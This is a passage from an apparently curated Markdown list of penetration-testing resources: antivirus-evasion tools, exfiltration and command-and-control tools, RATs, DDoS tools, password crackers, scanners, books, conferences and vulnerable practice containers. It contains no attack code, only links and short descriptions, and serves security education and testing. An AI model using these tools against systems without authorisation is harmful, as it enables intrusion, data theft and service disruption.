* [Shellter](https://www.shellterproject.com/) - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
* [UniByAv](https://github.com/Mr-Un1k0d3r/UniByAv) - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
* [Veil](https://www.veil-framework.com/) - Generate metasploit payloads that bypass common anti-virus solutions.
* [peCloakCapstone](https://github.com/v-p-b/peCloakCapstone) - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
## Books
See also [DEF CON Suggested Reading](https://www.defcon.org/html/links/book-list.html).
* [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)
* [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)
* [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362)
* [Android Hacker's Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [BTFM: Blue Team Field Manual by Alan J White & Ben Clark, 2017](https://www.amazon.de/Blue-Team-Field-Manual-BTFM/dp/154101636X)
* [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Bug Hunter's Diary by Tobias Klein, 2011](https://nostarch.com/bughunter)
* [Car Hacker's Handbook by Craig Smith, 2016](https://nostarch.com/carhacking)
* [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/)
* [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://nostarch.com/metasploit)
* [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://nostarch.com/pentesting)
* [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677)
* [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4)
* [RTFM: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/)
* [The Art of Exploitation by Jon Erickson, 2008](https://nostarch.com/hacking2.htm)
* [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Mobile Application Hacker's Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE)
* [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6)
* [iOS Hacker's Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
### Malware Analysis Books
See [awesome-malware-analysis § Books](https://github.com/rshipp/awesome-malware-analysis#books).
## CTF Tools
* [CTF Field Guide](https://trailofbits.github.io/ctf/) - Everything you need to win your next CTF competition.
* [Ciphey](https://github.com/ciphey/ciphey) - Automated decryption tool using artificial intelligence and natural language processing.
* [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - Decrypt data enciphered using weak RSA keys, and recover private keys from public keys using a variety of automated attacks.
* [ctf-tools](https://github.com/zardus/ctf-tools) - Collection of setup scripts to install various security research tools easily and quickly deployable to new machines.
* [shellpop](https://github.com/0x00-0x00/shellpop) - Easily generate sophisticated reverse or bind shell commands to help you save time during penetration tests.
## Cloud Platform Attack Tools
See also *[HackingThe.cloud](https://hackingthe.cloud/)*.
* [Cloud Container Attack Tool (CCAT)](https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/) - Tool for testing security of container environments.
* [CloudHunter](https://github.com/belane/CloudHunter) - Looks for AWS, Azure and Google cloud storage buckets and lists permissions for vulnerable buckets.
* [Cloudsplaining](https://cloudsplaining.readthedocs.io/) - Identifies violations of least privilege in AWS IAM policies and generates a pretty HTML report with a triage worksheet.
* [Endgame](https://endgame.readthedocs.io/) - AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account.
* [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - Script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated.
## Collaboration Tools
* [Dradis](https://dradisframework.com) - Open-source reporting and collaboration tool for IT security professionals.
* [Lair](https://github.com/lair-framework/lair/wiki) - Reactive attack collaboration framework and web application built with meteor.
* [Pentest Collaboration Framework (PCF)](https://gitlab.com/invuls/pentest-projects/pcf) - Open source, cross-platform, and portable toolkit for automating routine pentest processes with a team.
* [Reconmap](https://reconmap.org/) - Open-source collaboration platform for InfoSec professionals that streamlines the pentest process.
* [RedELK](https://github.com/outflanknl/RedELK) - Track and alarm about Blue Team activities while providing better usability in long term offensive operations.
## Conferences and Events
* [BSides](http://www.securitybsides.com/) - Framework for organising and holding security conferences.
* [CTFTime.org](https://ctftime.org/) - Directory of upcoming and archive of past Capture The Flag (CTF) competitions with links to challenge writeups.
### Asia
* [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands.
* [HITCON](https://hitcon.org/) - Hacks In Taiwan Conference held in Taiwan.
* [Nullcon](http://nullcon.net/website/) - Annual conference in Delhi and Goa, India.
* [SECUINSIDE](http://secuinside.com) - Security Conference in Seoul.
### Europe
* [44Con](https://44con.com/) - Annual Security Conference held in London.
* [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annually held in Novi Sad, Serbia.
* [BruCON](http://brucon.org) - Annual security conference in Belgium.
* [CCC](https://events.ccc.de/congress/) - Annual meeting of the international hacker scene in Germany.
* [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria.
* [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held annually in Bucharest, Romania.
* [FSec](http://fsec.foi.hr) - FSec - Croatian Information Security Gathering in Varaždin, Croatia.
* [Hack.lu](https://hack.lu/) - Annual conference held in Luxembourg.
* [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK.
* [SteelCon](https://www.steelcon.info/) - Security conference in Sheffield UK.
* [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - Annual security conference in Lucerne, Switzerland.
* [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany.
* [HoneyCON](https://honeycon.eu/) - Annual Security Conference in Guadalajara, Spain. Organized by the HoneySEC association.
### North America
* [AppSecUSA](https://appsecusa.org/) - Annual conference organized by OWASP.
* [Black Hat](http://www.blackhat.com/) - Annual security conference in Las Vegas.
* [CarolinaCon](https://carolinacon.org/) - Infosec conference, held annually in North Carolina.
* [DEF CON](https://www.defcon.org/) - Annual hacker convention in Las Vegas.
* [DerbyCon](https://www.derbycon.com/) - Annual hacker conference based in Louisville.
* [Hackers Next Door](https://hnd.techlearningcollective.com/) - Cybersecurity and social technology conference held in New York City.
* [Hackers On Planet Earth (HOPE)](https://hope.net/) - Semi-annual conference held in New York City.
* [Hackfest](https://hackfest.ca) - Largest hacking conference in Canada.
* [LayerOne](http://www.layerone.org/) - Annual US security conference held every spring in Los Angeles.
* [National Cyber Summit](https://www.nationalcybersummit.com/) - Annual US security conference and Capture the Flag event, held in Huntsville, Alabama, USA.
* [PhreakNIC](http://phreaknic.info/) - Technology conference held annually in middle Tennessee.
* [RSA Conference USA](https://www.rsaconference.com/) - Annual security conference in San Francisco, California, USA.
* [ShmooCon](http://shmoocon.org/) - Annual US East coast hacker convention.
* [SkyDogCon](http://www.skydogcon.com/) - Technology conference in Nashville.
* [SummerCon](https://www.summercon.org/) - One of the oldest hacker conventions in America, held during Summer.
* [ThotCon](http://thotcon.org/) - Annual US hacker conference held in Chicago.
* [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - Annual conference going to be held in Denver, USA for 2016.
### South America
* [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina.
* [Hackers to Hackers Conference (H2HC)](https://www.h2hc.com.br/) - Oldest security research (hacking) conference in Latin America and one of the oldest ones still active in the world.
### Zealandia
* [CHCon](https://chcon.nz) - Christchurch Hacker Con, Only South Island of New Zealand hacker con.
## Exfiltration Tools
* [DET](https://github.com/sensepost/DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
* [Iodine](https://code.kryo.se/iodine/) - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
* [TrevorC2](https://github.com/trustedsec/trevorc2) - Client/server tool for masking command and control and data exfiltration through a normally browsable website, not typical HTTP POST requests.
* [dnscat2](https://github.com/iagox86/dnscat2) - Tool designed to create an encrypted command and control channel over the DNS protocol, which is an effective tunnel out of almost every network.
* [pwnat](https://github.com/samyk/pwnat) - Punches holes in firewalls and NATs.
* [tgcd](http://tgcd.sourceforge.net/) - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
* [QueenSono](https://github.com/ariary/QueenSono) - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case).
## Exploit Development Tools
See also *[Reverse Engineering Tools](#reverse-engineering-tools)*.
* [Magic Unicorn](https://github.com/trustedsec/unicorn) - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or `certutil` (using fake certificates).
* [Pwntools](https://github.com/Gallopsled/pwntools) - Rapid exploit development framework built for use in CTFs.
* [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB.
* [Wordpress Exploit Framework](https://github.com/rastating/wordpress-exploit-framework) - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
## File Format Analysis Tools
* [ExifTool](https://www.sno.phy.queensu.ca/~phil/exiftool/) - Platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.
* [Hachoir](https://hachoir.readthedocs.io/) - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.
* [Kaitai Struct](http://kaitai.io/) - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
* [peepdf](https://eternal-todo.com/tools/peepdf-pdf-analysis-tool) - Python tool to explore PDF files in order to find out if the file can be harmful or not.
* [Veles](https://codisec.com/veles/) - Binary data visualization and analysis tool.
## GNU/Linux Utilities
* [Hwacha](https://github.com/n00py/Hwacha) - Post-exploitation tool to quickly execute payloads via SSH on one or more Linux systems simultaneously.
* [Linux Exploit Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
* [Lynis](https://cisofy.com/lynis/) - Auditing tool for UNIX-based systems.
* [checksec.sh](https://www.trapkit.de/tools/checksec.html) - Shell script designed to test what standard Linux OS and PaX security features are being used.
## Hash Cracking Tools
* [BruteForce Wallet](https://github.com/glv2/bruteforce-wallet) - Find the password of an encrypted wallet file (i.e. `wallet.dat`).
* [CeWL](https://digi.ninja/projects/cewl.php) - Generates custom wordlists by spidering a target's website and collecting unique words.
* [duplicut](https://github.com/nil0x42/duplicut) - Quickly remove duplicates, without changing the order, and without getting OOM on huge wordlists.
* [GoCrack](https://github.com/fireeye/gocrack) - Management Web frontend for distributed password cracking sessions using hashcat (or other supported tools) written in Go.
* [Hashcat](http://hashcat.net/hashcat/) - The more fast hash cracker.
* [hate_crack](https://github.com/trustedsec/hate_crack) - Tool for automating cracking methodologies through Hashcat.
* [JWT Cracker](https://github.com/lmammino/jwt-cracker) - Simple HS256 JSON Web Token (JWT) token brute force cracker.
* [John the Ripper](http://www.openwall.com/john/) - Fast password cracker.
* [Rar Crack](http://rarcrack.sourceforge.net) - RAR bruteforce cracker.
## Hex Editors
* [Bless](https://github.com/bwrsandman/Bless) - High quality, full featured, cross-platform graphical hex editor written in Gtk#.
* [Frhed](http://frhed.sourceforge.net/) - Binary file editor for Windows.
* [Hex Fiend](http://ridiculousfish.com/hexfiend/) - Fast, open source, hex editor for macOS with support for viewing binary diffs.
* [HexEdit.js](https://hexed.it) - Browser-based hex editing.
* [Hexinator](https://hexinator.com/) - World's finest (proprietary, commercial) Hex Editor.
* [hexedit](https://github.com/pixel/hexedit) - Simple, fast, console-based hex editor.
* [wxHexEditor](http://www.wxhexeditor.org/) - Free GUI hex editor for GNU/Linux, macOS, and Windows.
## Industrial Control and SCADA Systems
See also [awesome-industrial-control-system-security](https://github.com/hslatman/awesome-industrial-control-system-security).
* [Industrial Exploitation Framework (ISF)](https://github.com/dark-lbp/isf) - Metasploit-like exploit framework based on routersploit designed to target Industrial Control Systems (ICS), SCADA devices, PLC firmware, and more.
* [s7scan](https://github.com/klsecservices/s7scan) - Scanner for enumerating Siemens S7 PLCs on a TCP/IP or LLC network.
## Intentionally Vulnerable Systems
See also [awesome-vulnerable](https://github.com/kaiiyer/awesome-vulnerable).
### Intentionally Vulnerable Systems as Docker Containers
* [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/) - `docker pull citizenstig/dvwa`.
* [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container--) - `docker pull bkimminich/juice-shop`.
* [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) - `docker pull citizenstig/nowasp`.
* [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) - `docker-compose build && docker-compose up`.
* [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) - `docker pull ismisepaul/securityshepherd`.
* [OWASP WebGoat Project 7.1 docker image](https://hub.docker.com/r/webgoat/webgoat-7.1/) - `docker pull webgoat/webgoat-7.1`.
* [OWASP WebGoat Project 8.0 docker image](https://hub.docker.com/r/webgoat/webgoat-8.0/) - `docker pull webgoat/webgoat-8.0`.
* [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/) - `docker pull hmlio/vaas-cve-2014-0160`.
* [Vulnerability as a service: SambaCry](https://hub.docker.com/r/vulnerables/cve-2017-7494/) - `docker pull vulnerables/cve-2017-7494`.
* [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/) - `docker pull hmlio/vaas-cve-2014-6271`.
* [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/) - `docker pull wpscanteam/vulnerablewordpress`.
## Lock Picking
See [awesome-lockpicking](https://github.com/fabacab/awesome-lockpicking).
## macOS Utilities
* [Bella](https://github.com/kdaoudieh/Bella) - Pure Python post-exploitation data mining and remote administration tool for macOS.
* [EvilOSX](https://github.com/Marten4n6/EvilOSX) - Modular RAT that uses numerous evasion and exfiltration techniques out-of-the-box.
## Multi-paradigm Frameworks
* [Armitage](http://fastandeasyhacking.com/) - Java-based GUI front-end for the Metasploit Framework.
* [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query.
* [Decker](https://github.com/stevenaldinger/decker) - Penetration testing orchestration and automation framework, which allows writing declarative, reusable configurations capable of ingesting variables and using outputs of tools it has run as inputs to others.
* [Faraday](https://github.com/infobyte/faraday) - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
* [Metasploit](https://www.metasploit.com/) - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
* [Pupy](https://github.com/n1nj4sec/pupy) - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.
## Network Tools
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - Swiss army knife for pentesting networks.
* [IKEForce](https://github.com/SpiderLabs/ikeforce) - Command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.
* [Intercepter-NG](http://sniff.su/) - Multifunctional network toolkit.
* [Legion](https://github.com/GoVanguard/legion) - Graphical semi-automated discovery and reconnaissance framework based on Python 3 and forked from SPARTA.
* [Network-Tools.com](http://network-tools.com/) - Website offering an interface to numerous basic network utilities like `ping`, `traceroute`, `whois`, and more.
* [Ncrack](https://nmap.org/ncrack/) - High-speed network authentication cracking tool built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
* [Praeda](http://h.foofus.net/?page_id=218) - Automated multi-function printer data harvester for gathering usable data during security assessments.
* [Printer Exploitation Toolkit (PRET)](https://github.com/RUB-NDS/PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
* [SPARTA](https://sparta.secforce.com/) - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
* [SigPloit](https://github.com/SigPloiter/SigPloit) - Signaling security testing framework dedicated to telecom security for researching vulnerabilites in the signaling protocols used in mobile (cellular phone) operators.
* [Smart Install Exploitation Tool (SIET)](https://github.com/Sab0tag3d/SIET) - Scripts for identifying Cisco Smart Install-enabled switches on a network and then manipulating them.
* [THC Hydra](https://github.com/vanhauser-thc/thc-hydra) - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
* [Tsunami](https://github.com/google/tsunami-security-scanner) - General purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
* [Zarp](https://github.com/hatRiot/zarp) - Network attack tool centered around the exploitation of local networks.
* [dnstwist](https://github.com/elceef/dnstwist) - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
* [dsniff](https://www.monkey.org/~dugsong/dsniff/) - Collection of tools for network auditing and pentesting.
* [impacket](https://github.com/CoreSecurity/impacket) - Collection of Python classes for working with network protocols.
* [pivotsuite](https://github.com/RedTeamOperations/PivotSuite) - Portable, platform independent and powerful network pivoting toolkit.
* [routersploit](https://github.com/reverse-shell/routersploit) - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
* [rshijack](https://github.com/kpcyrd/rshijack) - TCP connection hijacker, Rust rewrite of `shijack`.
### DDoS Tools
* [Anevicon](https://github.com/rozgo/anevicon) - Powerful UDP-based load generator, written in Rust.
* [D(HE)ater](https://github.com/Balasys/dheater) - D(HE)ater sends forged cryptographic handshake messages to enforce the Diffie-Hellman key exchange.
* [HOIC](https://sourceforge.net/projects/high-orbit-ion-cannon/) - Updated version of Low Orbit Ion Cannon, has 'boosters' to get around common counter measures.
* [Low Orbit Ion Canon (LOIC)](https://github.com/NewEraCracker/LOIC) - Open source network stress tool written for Windows.
* [Memcrashed](https://github.com/649/Memcrashed-DDoS-Exploit) - DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API.
* [SlowLoris](https://github.com/gkbrk/slowloris) - DoS tool that uses low bandwidth on the attacking side.
* [T50](https://gitlab.com/fredericopissarra/t50/) - Faster network stress tool.
* [UFONet](https://github.com/epsylon/ufonet) - Abuses OSI layer 7 HTTP to create/manage 'zombies' and to conduct different attacks using; `GET`/`POST`, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.
### Network Reconnaissance Tools
* [ACLight](https://github.com/cyberark/ACLight) - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
* [AQUATONE](https://github.com/michenriksen/aquatone) - Subdomain discovery tool utilizing various open sources producing a report that can be used as input to other tools.
* [CloudFail](https://github.com/m0rtem/CloudFail) - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
* [DNSDumpster](https://dnsdumpster.com/) - Online DNS recon and search service.
* [Mass Scan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
* [OWASP Amass](https://github.com/OWASP/Amass) - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.
* [ScanCannon](https://github.com/johnnyxmas/ScanCannon) - POSIX-compliant BASH script to quickly enumerate large networks by calling `masscan` to quickly identify open ports and then `nmap` to gain details on the systems/services on those ports.
* [XRay](https://github.com/evilsocket/xray) - Network (sub)domain discovery and reconnaissance automation tool.
* [dnsenum](https://github.com/fwaeytens/dnsenum/) - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
* [dnsmap](https://github.com/makefu/dnsmap/) - Passive DNS network mapper.
* [dnsrecon](https://github.com/darkoperator/dnsrecon/) - DNS enumeration script.
* [dnstracer](http://www.mavetju.org/unix/dnstracer.php) - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
* [fierce](https://github.com/mschwager/fierce) - Python3 port of the original `fierce.pl` DNS reconnaissance tool for locating non-contiguous IP space.
* [netdiscover](https://github.com/netdiscover-scanner/netdiscover) - Network address discovery scanner, based on ARP sweeps, developed mainly for those wireless networks without a DHCP server.
* [nmap](https://nmap.org/) - Free security scanner for network exploration & security audits.
* [passivedns-client](https://github.com/chrislee35/passivedns-client) - Library and query tool for querying several passive DNS providers.
* [passivedns](https://github.com/gamelinux/passivedns) - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
* [RustScan](https://github.com/rustscan/rustscan) - Lightweight and quick open-source port scanner designed to automatically pipe open ports into Nmap.
* [scanless](https://github.com/vesche/scanless) - Utility for using websites to perform port scans on your behalf so as not to reveal your own IP.
* [smbmap](https://github.com/ShawnDEvans/smbmap) - Handy SMB enumeration tool.
* [subbrute](https://github.com/TheRook/subbrute) - DNS meta-query spider that enumerates DNS records, and subdomains.
* [zmap](https://zmap.io/) - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
### Protocol Analyzers and Sniffers
See also [awesome-pcaptools](https://github.com/caesar0301/awesome-pcaptools).
* [Debookee](http://www.iwaxx.com/debookee/) - Simple and powerful network traffic analyzer for macOS.
* [Dshell](https://github.com/USArmyResearchLab/Dshell) - Network forensic analysis framework.
* [Netzob](https://github.com/netzob/netzob) - Reverse engineering, traffic generation and fuzzing of communication protocols.
* [Wireshark](https://www.wireshark.org/) - Widely-used graphical, cross-platform network protocol analyzer.
* [netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - Swiss army knife for network sniffing.
* [sniffglue](https://github.com/kpcyrd/sniffglue) - Secure multithreaded packet sniffer.
* [tcpdump/libpcap](http://www.tcpdump.org/) - Common packet analyzer that runs under the command line.
### Network Traffic Replay and Editing Tools
* [TraceWrangler](https://www.tracewrangler.com/) - Network capture file toolkit that can edit and merge `pcap` or `pcapng` files with batch editing features.
* [WireEdit](https://wireedit.com/) - Full stack WYSIWYG pcap editor (requires a free license to edit packets).
* [bittwist](http://bittwist.sourceforge.net/) - Simple yet powerful libpcap-based Ethernet packet generator useful in simulating networking traffic or scenario, testing firewall, IDS, and IPS, and troubleshooting various network problems.
* [hping3](https://github.com/antirez/hping) - Network tool able to send custom TCP/IP packets.
* [pig](https://github.com/rafael-santiago/pig) - GNU/Linux packet crafting tool.
* [scapy](https://github.com/secdev/scapy) - Python-based interactive packet manipulation program and library.
* [tcpreplay](https://tcpreplay.appneta.com/) - Suite of free Open Source utilities for editing and replaying previously captured network traffic.
### Proxies and Machine-in-the-Middle (MITM) Tools
See also *[Intercepting Web proxies](#intercepting-web-proxies)*.
* [BetterCAP](https://www.bettercap.org/) - Modular, portable and easily extensible MITM framework.
* [Ettercap](http://www.ettercap-project.org) - Comprehensive, mature suite for machine-in-the-middle attacks.
* [Habu](https://github.com/portantier/habu) - Python utility implementing a variety of network attacks, such as ARP poisoning, DHCP starvation, and more.
* [Lambda-Proxy](https://github.com/puresec/lambda-proxy) - Utility for testing SQL Injection vulnerabilities on AWS Lambda serverless functions.
* [MITMf](https://github.com/byt3bl33d3r/MITMf) - Framework for Man-In-The-Middle attacks.
* [Morpheus](https://github.com/r00t-3xp10it/morpheus) - Automated ettercap TCP/IP Hijacking tool.
* [SSH MITM](https://github.com/jtesta/ssh-mitm) - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
* [dnschef](https://github.com/iphelix/dnschef) - Highly configurable DNS proxy for pentesters.
* [evilgrade](https://github.com/infobyte/evilgrade) - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
* [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH.
* [oregano](https://github.com/nametoolong/oregano) - Python module that runs as a machine-in-the-middle (MITM) accepting Tor client requests.
* [sylkie](https://dlrobertson.github.io/sylkie/) - Command line tool and library for testing networks for common address spoofing security vulnerabilities in IPv6 networks using the Neighbor Discovery Protocol.
### Transport Layer Security Tools
* [SSLyze](https://github.com/nabla-c0d3/sslyze) - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
* [crackpkcs12](https://github.com/crackpkcs12/crackpkcs12) - Multithreaded program to crack PKCS#12 files (`.p12` and `.pfx` extensions), such as TLS/SSL certificates.
* [testssl.sh](https://github.com/drwetter/testssl.sh) - Command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.
* [tls_prober](https://github.com/WestpointLtd/tls_prober) - Fingerprint a server's SSL/TLS implementation.
### Wireless Network Tools
* [Aircrack-ng](http://www.aircrack-ng.org/) - Set of tools for auditing wireless networks.
* [Airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) - Multi-use bash script for Linux systems to audit wireless networks.
* [BoopSuite](https://github.com/MisterBianco/BoopSuite) - Suite of tools written in Python for wireless auditing.
* [Bully](http://git.kali.org/gitweb/?p=packages/bully.git;a=summary) - Implementation of the WPS brute force attack, written in C.
* [Cowpatty](https://github.com/joswr1ght/cowpatty) - Brute-force dictionary attack against WPA-PSK.
* [Fluxion](https://github.com/FluxionNetwork/fluxion) - Suite of automated social engineering based WPA attacks.
* [KRACK Detector](https://github.com/securingsam/krackdetector) - Detect and prevent KRACK attacks in your network.
* [Kismet](https://kismetwireless.net/) - Wireless network detector, sniffer, and IDS.
* [PSKracker](https://github.com/soxrok2212/PSKracker) - Collection of WPA/WPA2/WPS default algorithms, password generators, and PIN generators written in C.
* [Reaver](https://code.google.com/archive/p/reaver-wps) - Brute force attack against WiFi Protected Setup.
* [WiFi Pineapple](https://www.wifipineapple.com/) - Wireless auditing and penetration testing platform.
* [WiFi-Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) - Framework for rogue Wi-Fi access point attack.
* [Wifite](https://github.com/derv82/wifite) - Automated wireless attack tool.
* [infernal-twin](https://github.com/entropy1337/infernal-twin) - Automated wireless hacking tool.
* [krackattacks-scripts](https://github.com/vanhoefm/krackattacks-scripts) - WPA2 Krack attack scripts.
* [pwnagotchi](https://github.com/evilsocket/pwnagotchi) - Deep reinforcement learning based AI that learns from the Wi-Fi environment and instruments BetterCAP in order to maximize the WPA key material captured.
* [wifi-arsenal](https://github.com/0x90/wifi-arsenal) - Resources for Wi-Fi Pentesting.
## Network Vulnerability Scanners
* [celerystalk](https://github.com/sethsec/celerystalk) - Asynchronous enumeration and vulnerability scanner that "runs all the tools on all the hosts" in a configurable manner.
* [kube-hunter](https://kube-hunter.aquasec.com/) - Open-source tool that runs a set of tests ("hunters") for security issues in Kubernetes clusters from either outside ("attacker's view") or inside a cluster.
* [Nessus](https://www.tenable.com/products/nessus-vulnerability-scanner) - Commercial vulnerability management, configuration, and compliance assessment platform, sold by Tenable.
* [Netsparker Application Security Scanner](https://www.netsparker.com/pricing/) - Application security scanner to automatically find security flaws.
* [Nexpose](https://www.rapid7.com/products/nexpose/) - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
* [OpenVAS](http://www.openvas.org/) - Free software implementation of the popular Nessus vulnerability assessment system.
* [Vuls](https://github.com/future-architect/vuls) - Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go.
### Web Vulnerability Scanners
* [ACSTIS](https://github.com/tijme/angularjs-csti-scanner) - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
* [Arachni](http://www.arachni-scanner.com/) - Scriptable framework for evaluating the security of web applications.
* [JCS](https://github.com/TheM4hd1/JCS) - Joomla Vulnerability Component Scanner with automatic database updater from exploitdb and packetstorm.
* [Nikto](https://cirt.net/nikto2) - Noisy but fast black box web server and web application vulnerability scanner.
* [SQLmate](https://github.com/UltimateHackers/sqlmate) - Friend of `sqlmap` that identifies SQLi vulnerabilities based on a given dork and (optional) website.
* [SecApps](https://secapps.com/) - In-browser web application security testing suite.
* [WPScan](https://wpscan.org/) - Black box WordPress vulnerability scanner.
* [Wapiti](http://wapiti.sourceforge.net/) - Black box web application vulnerability scanner with built-in fuzzer.
* [WebReaver](https://www.webreaver.com/) - Commercial, graphical web application vulnerability scanner designed for macOS.
* [cms-explorer](https://code.google.com/archive/p/cms-explorer/) - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
* [joomscan](https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) - Joomla vulnerability scanner.
* [skipfish](https://www.kali.org/tools/skipfish/) - Performant and adaptable active web application security reconnaissance tool.
